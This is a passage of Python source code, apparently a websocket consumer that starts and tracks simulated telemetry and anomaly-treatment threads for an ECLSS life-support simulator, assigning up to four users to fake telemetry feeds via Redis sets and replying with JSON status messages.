r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Fake at thread 2 and fake telemetry thread 2 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[1] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 2",
args=(
global_obj.simulator_to_hub_queues[
1],
global_obj.hub_to_simulator_queues[
1]
))
global_obj.simulator_threads[1].start()
# If simulator thread 2 start was successful then assign it to fake telemetry 2 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[1].is_alive():
print("Fake Telemetry Thread 2 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 2 and Fake AT Thread 2 '
'was already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 2 and send back error message
else:
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 2 was already running but failure to start fake'
'telemetry thread 2. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If not alive then reinitialize it and handle telemetry feed normally
else:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[1] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 2",
args=(
global_obj.hub_to_simulator_at_queues[
1],
global_obj.simulator_at_to_hub_queues[
1],
))
global_obj.simulator_at_threads[1].start()
# If simulator at thread 2 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[1].is_alive():
print("Fake AT Thread 2 started.")
# Check if simulator thread 2 has not been initialized, then initialize it
if global_obj.simulator_threads[1] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[1] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 2",
args=(
global_obj.simulator_to_hub_queues[
1],
global_obj.hub_to_simulator_queues[
1]
))
global_obj.simulator_threads[1].start()
# If simulator thread 2 start was successful then assign it to fake telemetry 2 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[1].is_alive():
print("Fake Telemetry Thread 2 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 2 and Fake AT Thread 2.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 2 and send back error message
else:
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 2 but failure to start fake'
'telemetry thread 2. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 2 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[1].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 2 and fake telemetry thread 2 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[1] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 2",
args=(
global_obj.simulator_to_hub_queues[
1],
global_obj.hub_to_simulator_queues[
1]
))
global_obj.simulator_threads[1].start()
# If simulator thread 2 start was successful then assign it to fake telemetry 2 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[1].is_alive():
print("Fake Telemetry Thread 2 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_two",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-two', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 2 and Fake AT Thread 2.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 2 and send back error message
else:
global_obj.hub_to_simulator_at_queues[1].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 2 but failure to start fake'
'telemetry thread 2. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 2 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 2. Fake telemetry 2 was not started.',
'attempt': content.get('attempt')
}
}))
# Fake telemetry 3 check
elif r.scard('fake-telemetry-three') == 0:
# Check if simulator at thread 3 has not been initialized, then initialize it
if global_obj.simulator_at_threads[2] is None:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[2] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 3",
args=(
global_obj.hub_to_simulator_at_queues[2],
global_obj.simulator_at_to_hub_queues[2],
))
global_obj.simulator_at_threads[2].start()
# If simulator at thread 3 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[2].is_alive():
print("Fake AT Thread 3 started.")
# Check if simulator thread 3 has not been initialized, then initialize it
if global_obj.simulator_threads[2] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[2] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 3",
args=(
global_obj.simulator_to_hub_queues[
2],
global_obj.hub_to_simulator_queues[2]
))
global_obj.simulator_threads[2].start()
# If simulator thread 3 start was successful then assign it to fake telemetry 3 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[2].is_alive():
print("Fake Telemetry Thread 3 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 3 and Fake AT Thread 3.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 3 and send back error message
else:
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 3 but failure to start fake'
'telemetry thread 3. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 1 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[2].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 3 and fake telemetry thread 3 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[2] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 3",
args=(
global_obj.simulator_to_hub_queues[
2],
global_obj.hub_to_simulator_queues[
2]
))
global_obj.simulator_threads[2].start()
# If simulator thread 3 start was successful then assign it to fake telemetry 3 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[2].is_alive():
print("Fake Telemetry Thread 3 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 3 and Fake AT Thread 3.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 3 and send back error message
else:
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 3 but failure to start fake'
'telemetry thread 3. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 3 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 3. Fake telemetry 3 was not started.',
'attempt': content.get('attempt')
}
}))
# Simulator at thread 1 has already been initialized
else:
# Check if alive then handle telemetry feed normally
if global_obj.simulator_at_threads[2].is_alive():
# Check if simulator thread 3 has not been initialized, then initialize it
if global_obj.simulator_threads[2] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[2] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 3",
args=(
global_obj.simulator_to_hub_queues[
2],
global_obj.hub_to_simulator_queues[2]
))
global_obj.simulator_threads[2].start()
# If simulator thread 3 start was successful then assign it to fake telemetry 3 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[2].is_alive():
print("Fake Telemetry Thread 3 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 3 and Fake AT Thread 3 was '
'already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 3 and send back error message
else:
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 3 was already running but failure to start fake'
'telemetry thread 3. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 1 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[2].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Fake at thread 3 and fake telemetry thread 3 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[2] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 3",
args=(
global_obj.simulator_to_hub_queues[
2],
global_obj.hub_to_simulator_queues[
2]
))
global_obj.simulator_threads[2].start()
# If simulator thread 3 start was successful then assign it to fake telemetry 3 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[2].is_alive():
print("Fake Telemetry Thread 3 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 3 and Fake AT Thread 3 '
'was already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 3 was already running but failure to start fake'
'telemetry thread 3. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If not alive then reinitialize it and handle telemetry feed normally
else:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[2] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 3",
args=(
global_obj.hub_to_simulator_at_queues[
2],
global_obj.simulator_at_to_hub_queues[
2],
))
global_obj.simulator_at_threads[2].start()
# If simulator at thread 3 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[2].is_alive():
print("Fake AT Thread 3 started.")
# Check if simulator thread 3 has not been initialized, then initialize it
if global_obj.simulator_threads[2] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[2] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 3",
args=(
global_obj.simulator_to_hub_queues[
2],
global_obj.hub_to_simulator_queues[
2]
))
global_obj.simulator_threads[2].start()
# If simulator thread 3 start was successful then assign it to fake telemetry 3 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[2].is_alive():
print("Fake Telemetry Thread 3 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 3 and Fake AT Thread 3.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 3 but failure to start fake'
'telemetry thread 3. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 3 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[2].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 3 and fake telemetry thread 3 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[2] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 3",
args=(
global_obj.simulator_to_hub_queues[
2],
global_obj.hub_to_simulator_queues[
2]
))
global_obj.simulator_threads[2].start()
# If simulator thread 3 start was successful then assign it to fake telemetry 3 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[2].is_alive():
print("Fake Telemetry Thread 3 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_three",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-three', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 3 and Fake AT Thread 3.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 3 and send back error message
else:
global_obj.hub_to_simulator_at_queues[2].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 3 but failure to start fake'
'telemetry thread 3. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 3 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 3. Fake telemetry 3 was not started.',
'attempt': content.get('attempt')
}
}))
# Fake telemtry 4 check
elif r.scard('fake-telemetry-four') == 0:
# Check if simulator at thread 4 has not been initialized, then initialize it
if global_obj.simulator_at_threads[3] is None:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[3] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 4",
args=(
global_obj.hub_to_simulator_at_queues[3],
global_obj.simulator_at_to_hub_queues[3],
))
global_obj.simulator_at_threads[3].start()
# If simulator at thread 4 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[3].is_alive():
print("Fake AT Thread 4 started.")
# Check if simulator thread 4 has not been initialized, then initialize it
if global_obj.simulator_threads[3] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[3] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 4",
args=(
global_obj.simulator_to_hub_queues[
3],
global_obj.hub_to_simulator_queues[3]
))
global_obj.simulator_threads[3].start()
# If simulator thread 4 start was successful then assign it to fake telemetry 4 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[3].is_alive():
print("Fake Telemetry Thread 4 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 4 and Fake AT Thread 4.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 4 but failure to start fake'
'telemetry thread 4. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 4 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[3].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 4 and fake telemetry thread 4 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[3] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 4",
args=(
global_obj.simulator_to_hub_queues[
3],
global_obj.hub_to_simulator_queues[
3]
))
global_obj.simulator_threads[3].start()
# If simulator thread 4 start was successful then assign it to fake telemetry 4 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[3].is_alive():
print("Fake Telemetry Thread 4 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 4 and Fake AT Thread 4.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 4 but failure to start fake'
'telemetry thread 4. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 4 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 4. Fake telemetry 4 was not started.',
'attempt': content.get('attempt')
}
}))
# Simulator at thread 4 has already been initialized
else:
# Check if alive then handle telemetry feed normally
if global_obj.simulator_at_threads[3].is_alive():
# Check if simulator thread 4 has not been initialized, then initialize it
if global_obj.simulator_threads[3] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[3] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 4",
args=(
global_obj.simulator_to_hub_queues[
3],
global_obj.hub_to_simulator_queues[3]
))
global_obj.simulator_threads[3].start()
# If simulator thread 4 start was successful then assign it to fake telemetry 4 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[3].is_alive():
print("Fake Telemetry Thread 4 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 4 and Fake AT Thread 4 was '
'already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 4 was already running but failure to start fake'
'telemetry thread 4. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 1 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[3].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Fake at thread 4 and fake telemetry thread 4 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[3] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 4",
args=(
global_obj.simulator_to_hub_queues[
3],
global_obj.hub_to_simulator_queues[
3]
))
global_obj.simulator_threads[3].start()
# If simulator thread 4 start was successful then assign it to fake telemetry 4 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[3].is_alive():
print("Fake Telemetry Thread 4 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 4 and Fake AT Thread 4 '
'was already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 4 and send back error message
else:
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Fake at thread 4 was already running but failure to start fake'
'telemetry thread 4. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If not alive then reinitialize it and handle telemetry feed normally
else:
# Anomaly detection thread initialization
global_obj.simulator_at_threads[3] = threading.Thread(target=anomaly_treatment_routine,
name="Fake AT Thread 4",
args=(
global_obj.hub_to_simulator_at_queues[
3],
global_obj.simulator_at_to_hub_queues[
3],
))
global_obj.simulator_at_threads[3].start()
# If simulator at thread 4 start was successful then proceed to start the telemetry thread
if global_obj.simulator_at_threads[3].is_alive():
print("Fake AT Thread 4 started.")
# Check if simulator thread 4 has not been initialized, then initialize it
if global_obj.simulator_threads[3] is None:
# Telemetry Feed thread initialization
global_obj.simulator_threads[3] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 4",
args=(
global_obj.simulator_to_hub_queues[
3],
global_obj.hub_to_simulator_queues[
3]
))
global_obj.simulator_threads[3].start()
# If simulator thread 4 start was successful then assign it to fake telemetry 4 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[3].is_alive():
print("Fake Telemetry Thread 4 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 4 and Fake AT Thread 4.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 4 and send back error message
else:
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 4 but failure to start fake'
'telemetry thread 4. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# Simulator thread 4 has been initialized before
else:
# Check if the thread is alive then send already running message
if global_obj.simulator_threads[3].is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting fake at thread 4 and fake telemetry thread 4 was'
' already running.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# If not running, then reinitialize
else:
# Telemetry Feed thread initialization
global_obj.simulator_threads[3] = threading.Thread(target=simulate_by_dummy_eclss,
name="Fake Telemetry Thread 4",
args=(
global_obj.simulator_to_hub_queues[
3],
global_obj.hub_to_simulator_queues[
3]
))
global_obj.simulator_threads[3].start()
# If simulator thread 4 start was successful then assign it to fake telemetry 4 and
# give the channel name and layer to the hub thread
if global_obj.simulator_threads[3].is_alive():
print("Fake Telemetry Thread 4 started.")
global_obj.frontend_to_hub_queue.put({"type": "add_fake_telemetry_four",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
r.sadd('fake-telemetry-four', self.channel_name)
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting Fake Telemetry Thread 4 and Fake AT Thread 4.',
'attempt': content.get('attempt')
}
}))
# Get telemetry parameters
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params',
'channel_name': self.channel_name})
# Else stop the fake at thread 1 and send back error message
else:
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Fake AT Thread 4 but failure to start fake'
'telemetry thread 4. Fake AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If simulator at thread 4 start was a failure then don't start the fake telemetry thread
# and send error
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting fake at thread 4. Fake telemetry 4 was not started.',
'attempt': content.get('attempt')
}
}))
# Check if all are full
elif r.scard('fake-telemetry-one') == 1 and r.scard('fake-telemetry-two') == 1 and \
r.scard('fake-telemetry-three') == 1 and r.scard('fake-telemetry-four') == 1:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'full',
'message': 'All fake telemetries are in use.',
'attempt': content.get('attempt')
}
}))
# Should not get to here
else:
self.send(json.dumps({
'type': 'fake_telemetry_response',
'content': {
'status': 'error',
'message': 'This user did not get assigned a fake telemetry even though not all were full.',
'attempt': content.get('attempt')
}
}))
elif content.get('type') == 'start_real_telemetry':
# Check if sEclss at thread is not initialized then initialize it and handle sEclss thread
if global_obj.sEclss_at_thread is None:
# Anomaly detection thread initialization for real telemetry
global_obj.sEclss_at_thread = threading.Thread(target=anomaly_treatment_routine,
name="Real AT Thread",
args=(global_obj.hub_to_sEclss_at_queue,
global_obj.sEclss_at_to_hub_queue,))
global_obj.sEclss_at_thread.start()
# Check that the anomaly detection thread is working then check sEclss thread
if global_obj.sEclss_at_thread.is_alive():
print("Real AT Thread started.")
# Check if sEclss thread has not been initialized, then initialize it
if global_obj.sEclss_thread is None:
# Simulator thread initialization
global_obj.sEclss_thread = threading.Thread(target=handle_eclss_update,
name="Real Telemetry Thread",
